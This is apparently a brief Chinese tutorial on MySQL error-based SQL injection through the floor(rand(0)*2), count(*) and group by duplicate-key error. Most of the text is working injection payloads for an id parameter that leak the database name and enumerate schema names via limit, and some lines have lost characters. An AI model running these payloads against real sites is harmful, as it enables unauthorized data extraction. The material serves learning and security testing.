介绍
floor,count,group by冲突报错,当这三个函数在特定情况一起使用产生的错误
最经典的floor注入语句
and select 1 from(select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a
select count(*),floor(rand(0)*2)x from test group by x
这里的X是自定义sql语句的别名,相当于赋值
x=floor(rand(0)*2)
当group by x在一起后,就会报错
select count(*),concat(database(),floor(0)*2)x from test group by x
就会报错
这个test1,test是数据库名,1是floor(0)*2返回的结果,通过concat拼接,返回test1
报错点在于concat(报错点,floor(0)2)x
带入我们的sql语句
select count(*),concat((select schema_name from information_schema.schemata),floor(rand(0)*2))x from information_schema.tables group by x
去sql注入界面试试
将sql语句修改为
id=1 and 1=(select 1 from (select count(),concat(database(),floor(rand(0)2))x from information_schema.tables group by x)a)
id=1 True
and 1=sql语句结果。不会怎样。都会报错执行
爆出数据库:
id=1 and 1=(select 1 from (select count(),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
limit 一个个遍历过去